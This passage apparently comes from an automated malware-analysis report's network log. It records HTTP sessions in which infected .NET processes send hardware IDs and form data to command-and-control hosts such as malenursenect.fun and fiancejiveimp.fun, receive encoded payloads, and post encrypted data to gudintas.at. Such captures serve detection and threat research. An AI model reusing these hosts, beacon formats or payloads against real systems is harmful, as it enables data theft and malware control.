                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:46.242861032 CEST4575INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:46 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=q2apaoa3k3p3dhs8ql5jvopht4; expires=Sat, 27 Jan 2024 09:49:25 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:46 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fkpnBXwWC3CwtDdF7YkIz4%2BKxHMzILqVnXT2POKz78Db4naOsV%2FlV5VEYgDox80zY1XNR331GI8ZqC6jdvfhbFImN%2BIzdIbyNj5YR5oNOQgdQ8%2F9fUXNV77KOEUuMNU8LHpoaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106694d2a4d07f9-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:46.242872953 CEST4575INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.349840104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:46.461905003 CEST4576OUTPOST /api HTTP/1.1
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Host: malenursenect.fun
                                                                                                        Content-Length: 61
                                                                                                        Cache-Control: no-cache
                                                                                                        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 50 72 54 69 4f 37 2d 2d 49 6e 73 74 61 6c 6c 42 65 73 74 32 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30
                                                                                                        Data Ascii: act=recive_message&lid=PrTiO7--InstallBest2&j=default&ver=4.0
                                                                                                        Oct 3, 2023 18:02:46.794565916 CEST4579INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:46 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=ek9svgh4rr78irbdavok43bdj8; expires=Sat, 27 Jan 2024 09:49:25 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:46 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1CkHA1TOU2ZueUE6iahMa%2Bq2DgEF4k5VOhxn2vkHZd3q60db%2BPCvO0S0ZvG%2Fny8ndfX0YsIgNStJSHee7vQdckgc4Lwh1LUujWP8bv0SwgdDO%2FrRv0qjM42cac%2FjPiYzMQQvHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669509a116fa3-IAD
                                                                                                        Data Raw: 34 30 37 30 0d 0a 6a 64 6f 79 49 2b 52 72 58 61 54 4d 7a 45 32 68 2f 68 78 6d 32 79 56 56 39 68 76 63 6c 31 32 4a 32 38 7a 31 73 47 44 32 43 43 44 32 31 7a 67 44 78 45 74 39 68 72 72 75 64 34 48 4b 4d 47 76 52 42 58 58 57 4f 2f 37 6b 4f 4b 76 68 37 49 48 43 46 5a 4d 6b 4c 59 66 36 45 67 50 45 53 54 7a 41 37 76 5a 74 78 35 39 77 46 62 34 4a 57 50 77 37 2f 4c 64 39 71 37 36 30 31 34 70 41 72 51 55 71 72 66 6f 53 41 38 52 4c 4a 71 6e 47 37 47 32 42 33 6a 78 47 2b 77 56 33 6b 33 58 2b 72
                                                                                                        Data Ascii: 4070jdoyI+RrXaTMzE2h/hxm2yVV9hvcl12J28z1sGD2CCD21zgDxEt9hrrud4HKMGvRBXXWO/7kOKvh7IHCFZMkLYf6EgPESTzA7vZtx59wFb4JWPw7/Ld9q76014pArQUqrfoSA8RLJqnG7G2B3jxG+wV3k3X+r
                                                                                                        Oct 3, 2023 18:02:46.794591904 CEST4581INData Raw: 58 32 72 76 71 61 58 30 51 79 55 61 55 76 69 71 6c 35 41 6a 41 63 36 7a 4b 6d 76 4b 63 43 53 63 51 4f 2b 51 44 53 63 64 62 58 36 4e 65 54 35 34 50 69 36 51 4e 59 6f 41 4b 33 36 45 67 50 47 44 69 65 47 39 75 78 76 37 4a 74 6f 42 35 5a 45 4a 70 30
                                                                                                        Data Ascii: X2rvqaX0QyUaUviql5AjAc6zKmvKcCScQO+QDScdbX6NeT54Pi6QNYoAK36EgPGDieG9uxv7JtoB5ZEJp050Z19qfvs1ZAd2gUqrfoSA8RLJqnG7G2B3jxG+wV3k3X+rX2rtaeX2QiQakXivVNGhQQ4zKCpK8+VcwK5QDORa7v8M+f54Pi6QNYoAK36EgPGDieG9uxv7JtoB5ZEJp050Z19qfvs1ZAd2gUqrfoSA8RLJqnG7G2B
                                                                                                        Oct 3, 2023 18:02:46.794898033 CEST4582INData Raw: 56 6b 67 57 59 4b 68 71 74 2b 46 70 54 67 77 63 37 7a 4b 75 71 49 38 6d 63 65 78 61 78 51 54 43 59 63 62 76 36 4f 65 36 30 71 5a 7a 52 45 49 5a 70 52 75 47 30 45 41 2f 70 59 58 32 45 37 4f 78 74 67 64 34 38 52 4c 35 66 64 38 77 37 2f 74 41 6f 36
                                                                                                        Data Ascii: VkgWYKhqt+FpTgwc7zKuqI8mcexaxQTCYcbv6Oe60qZzREIZpRuG0EA/pYX2E7Oxtgd48RL5fd8w7/tAo6KmolJJt/CgArfoSA5lHUK7s7G2B3jwd1i911jv8t32p++6Q3kLMKALvtlxKgQI0wqquIsiScA21TzuTa7PwN+Gwq5vfAYZpQ6/2PynES32E7Oxtgdx5HPkfddRejcIcq9bG1ZBA1igA8PY/KcRLfYTs7Das9DxG+w
                                                                                                        Oct 3, 2023 18:02:46.795315027 CEST4584INData Raw: 45 76 6e 76 6c 39 49 6c 41 6f 7a 79 4b 6d 67 49 38 32 52 64 41 65 30 42 33 6e 37 45 66 79 33 66 61 6e 37 37 4e 57 51 51 70 4e 79 41 72 66 36 45 47 32 42 42 42 48 4e 6f 71 6c 76 72 50 51 38 52 76 73 46 64 64 5a 6d 38 4a 70 58 71 66 76 73 31 5a 42
                                                                                                        Data Ascii: Evnvl9IlAozyKmgI82RdAe0B3n7Efy3fan77NWQQpNyArf6EG2BBBHNoqlvrPQ8RvsFddZm8JpXqfvs1ZBAjQUqrfoSA8RLfYTuqSODxDxEtU07nXm38DfgsKuW2QeXbE/gsUJLhQc8yqKoLsCOdg35CVj8O/y3fan77NWSBYwqGq34cU+LHTjW7sFHgd48RvsFKNoW1p59qaDB/5BA1igArfoSAYEFf57s7izCk30FtEE+nHm4
                                                                                                        Oct 3, 2023 18:02:46.795824051 CEST4585INData Raw: 41 67 54 77 38 79 4b 43 70 4f 59 50 7a 46 6b 62 37 42 58 58 57 4f 36 47 37 56 49 54 52 78 64 57 51 47 2f 73 43 41 4b 33 36 45 67 50 45 53 33 32 47 71 61 4a 76 6d 39 34 2b 43 62 56 4e 4f 70 46 39 74 76 49 38 36 72 57 71 6d 74 38 47 6e 57 35 48 2f
                                                                                                        Data Ascii: AgTw8yKCpOYPzFkb7BXXWO6G7VITRxdWQG/sCAK36EgPES32GqaJvm94+CbVNOpF9tvI86rWqmt8GnW5H/apWT4YGMcmivCHGnHJE9yhf1jv8t32p++zX1RrUMgCviUdBxmZXhOzsbYHeYUrSKF/7EdW3ffLWxtWQQNYoAK36EEaKSWeE7qEi0ZBxBLhEM59+uPM+6LytktQDlGZI6LBaT4sPO8Co7mGs9DxG+wV11jv8tTjz+f
                                                                                                        Oct 3, 2023 18:02:46.795888901 CEST4586INData Raw: 75 7a 73 62 59 48 65 50 42 76 33 4b 46 2f 57 4f 2f 79 33 66 61 6d 67 77 66 2b 51 51 4e 59 6f 41 4b 33 36 45 67 47 42 42 58 2b 65 37 4f 34 6e 7a 70 52 30 41 4c 35 4b 4d 4a 4a 77 72 50 77 36 35 62 6d 71 6e 4e 30 45 6b 47 6c 43 2f 62 35 55 53 59 55
                                                                                                        Data Ascii: uzsbYHePBv3KF/WO/y3famgwf+QQNYoAK36EgGBBX+e7O4nzpR0AL5KMJJwrPw65bmqnN0EkGlC/b5USYUEMsitqm+N8xZG+wV11jv8t3/soe7PkEKmZ0z0t1dQjElQruzsbYHePBv3KF/WO/y3famgwf+QQNYoAK36EgGBBX+e7O4rzY51BbJMOZN2u/8/5L2tmdkDl2JP4rZaSI8OM8Kp7mGs9DxG+wV11jv8tTjz+fbVkim1
                                                                                                        Oct 3, 2023 18:02:46.795944929 CEST4588INData Raw: 65 50 45 62 37 42 58 57 4e 46 74 61 33 66 61 6e 37 37 4e 57 51 51 4e 52 74 54 71 2f 67 45 67 47 47 43 44 4c 55 71 36 38 6c 79 5a 46 32 43 37 78 43 4f 4a 42 39 74 66 73 74 35 62 61 75 6b 64 6b 44 6b 57 6c 4a 35 62 5a 5a 55 38 5a 48 55 4b 37 73 37
                                                                                                        Data Ascii: ePEb7BXWNFta3fan77NWQQNRtTq/gEgGGCDLUq68lyZF2C7xCOJB9tfst5baukdkDkWlJ5bZZU8ZHUK7s7G2B3jxG+wcwjDnmt3/Boq+a3kC6YVTo+nFPjQ4z0O7BR4HePEb7BSjaFta3fan77NXLbfwoAK36EgPES3/Bou53gdx3CrVEMJxxu/U067akmdUQnmZI/bdTTIIENcOnvCrKmj5K1i911jv8t32p++6QykLMKALXs1
                                                                                                        Oct 3, 2023 18:02:46.795995951 CEST4589INData Raw: 58 58 57 4f 2f 7a 73 55 49 50 37 37 4e 57 51 51 4e 59 6f 41 4b 2b 2f 58 41 48 65 53 33 2f 4e 6f 4b 73 75 7a 35 5a 35 43 71 74 47 50 5a 68 34 75 66 49 30 2b 62 4b 38 6e 4e 6f 42 6d 6d 4a 4c 37 37 5a 51 51 49 73 4a 66 34 6a 42 78 6d 32 42 33 6a 78
                                                                                                        Data Ascii: XXWO/zsUIP77NWQQNYoAK+/XAHeS3/NoKsuz5Z5CqtGPZh4ufI0+bK8nNoBmmJL77ZQQIsJf4jBxm2B3jxG+wV11H6mtWep+Yu0xRSeKGH4rlpGih80x624ItPcEWz7BXXWO/zqcYTR7NWQQNYoW4DQEgPES32E7OxvxJA+XPsHPJt3s/474rymlNcHnmZO7rBZS4MMOcytoCDCkHoNt0532hbWt32p++zVkEDUbVqv4BIBsBk4
                                                                                                        Oct 3, 2023 18:02:46.796046019 CEST4590INData Raw: 31 5a 36 6e 70 34 50 69 36 51 4e 59 6f 41 4b 33 36 45 67 50 47 44 53 36 47 39 75 78 2f 6b 63 63 72 56 2b 34 58 5a 66 73 52 2f 4c 64 39 71 66 76 73 69 4a 78 74 2f 43 67 41 72 66 6f 53 41 35 39 6d 56 34 54 73 37 47 32 42 33 6a 78 47 2b 56 46 33 7a
                                                                                                        Data Ascii: 1Z6np4Pi6QNYoAK36EgPGDS6G9ux/kccrV+4XZfsR/Ld9qfvsiJxt/CgArfoSA59mV4Ts7G2B3jxG+VF3zDvsu1CD++zVkEDWKACvqhAZxEl4xby8KcCKfUOHeRmTf7vyL6mXpYPVQtoFKq36EgPES32E7qFvm95HRPEHCNoW1rd9qfvs1ZBA1HICt/oQdIUHMcG4v2Ltm3gBvld1unKq8n+l1sbVkEDWKACt+hBHxlF9luDBR4
                                                                                                        Oct 3, 2023 18:02:46.796324015 CEST4592INData Raw: 63 65 41 62 66 77 6f 41 4b 33 36 45 67 4f 5a 52 31 43 75 37 4f 78 74 67 64 34 38 48 64 59 76 64 64 59 37 2f 4c 64 39 71 66 76 75 67 5a 4a 61 31 6a 67 4d 67 4e 41 53 41 38 52 4c 66 59 54 73 37 47 2f 52 33 43 5a 47 2b 51 41 30 68 6d 75 34 39 69 6e
                                                                                                        Data Ascii: ceAbfwoAK36EgOZR1Cu7Oxtgd48HdYvddY7/Ld9qfvugZJa1jgMgNASA8RLfYTs7G/R3CZG+QA0hmu49ino/pCp8gmYaU7uvxAP6WF9hOzsbYHePES2B2/WOb3nLaSouJrCBdhiU+K0HgPKDTTKq6k/jI5uD7VRe5Br8Lcu4La8mdVNhXxP/7tVRsoBLsui7mGs9DxG+wV11jv8tSer4ezX5wGaZEX5qR1hjQU8yq+pb43zFkb7
                                                                                                        Oct 3, 2023 18:02:46.796344995 CEST4593INData Raw: 70 41 71 48 58 4f 41 50 45 53 33 32 45 37 4f 78 74 67 35 4d 2b 58 50 74 2b 57 50 77 37 2f 4c 64 39 71 66 76 73 31 5a 42 41 31 69 67 43 2f 37 39 52 52 6f 6f 66 4c 73 47 2b 75 69 6a 54 6a 54 49 65 74 6b 6c 33 32 68 62 57 74 33 32 70 2b 2b 7a 56 6b
                                                                                                        Data Ascii: pAqHXOAPES32E7Oxtg5M+XPt+WPw7/Ld9qfvs1ZBA1igC/79RRoofLsG+uijTjTIetkl32hbWt32p++zVkEDWKACt+EFKkA4wxaKtKsSMMh62SXf7Efy3fan77NWQPdoFKq36EgPES32E7rZvm94+J6tVOZ94veM05rW/2vYJmm165LZeQsZHUK7s7G2B3jxG+wcx1CH8pXGE0ezVkEDWKACt+FRQxlF9lvz1epDLLlbWL3XWO/


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.349841172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:46.461993933 CEST4577OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:46.462414026 CEST4577OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:46.829185963 CEST4598INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:46 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=rsl0hh3re5pkujs6omt2fjg3t6; expires=Sat, 27 Jan 2024 09:49:25 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:46 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QC3m%2FIFxNhs%2BycFxI4lxad68gB0pG75RwsJQ5cn93MQoX9Vv0AZZqnQPghtpt4cyc71VzpgH%2FO%2F0ue3mMrNJmepKggS%2BVXhjfvwuWckC5thEOpbbiAkQPjf1ydptF6YKDByWOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669509c412d18-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:46.829199076 CEST4598INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.349844104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:47.032856941 CEST4600OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:47.032856941 CEST4601OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:47.371155977 CEST4613INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:47 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=heib99a85a7ebqrfsvhrkq11vm; expires=Sat, 27 Jan 2024 09:49:26 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:47 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9HX7OnKI2tScnOHgDPWnfVueSpakO4opB0aF2ZUQdXSsUgRivpC0XN8w7WzhfawDLM2j3UT3DGxZECWxa%2FAYFCe4nJAmq%2Bdx1pAZz%2BA13wBjVsbGc%2FQoXHk%2BhfbQ6xVsXVFO7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066954284f5a4c-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:47.371187925 CEST4613INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.349845104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:47.044584036 CEST4601OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:47.044955969 CEST4602OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:47.530338049 CEST4627INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:47 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=ku1haoraoegkce8f9gt5jnefcv; expires=Sat, 27 Jan 2024 09:49:26 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:47 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GQ0Wv7mS3Gxl5mP5XyZTJe6S51InOQd3zpjq%2FZbbYt9gKzqb13%2BXUxMIn%2BK226Hx306Ez98O1%2Fl8onTAF6V59f6I14zh%2B3HkElu3Y2k%2FZ4RmAEe1C4GYC3l6ajviNhrCsbdFwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669543cba5854-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:47.530353069 CEST4627INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.349843211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:47.213037014 CEST4612OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://dqstp.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 255
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:47.213067055 CEST4612OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 24 26 d3 b7
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu$&Xews|GK4j/:sy'*C; @,I>c=gZJSR(~uk.1
                                                                                                        Oct 3, 2023 18:02:48.331516981 CEST4642INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:47 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.349846172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:47.592349052 CEST4628OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:47.593101978 CEST4629OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
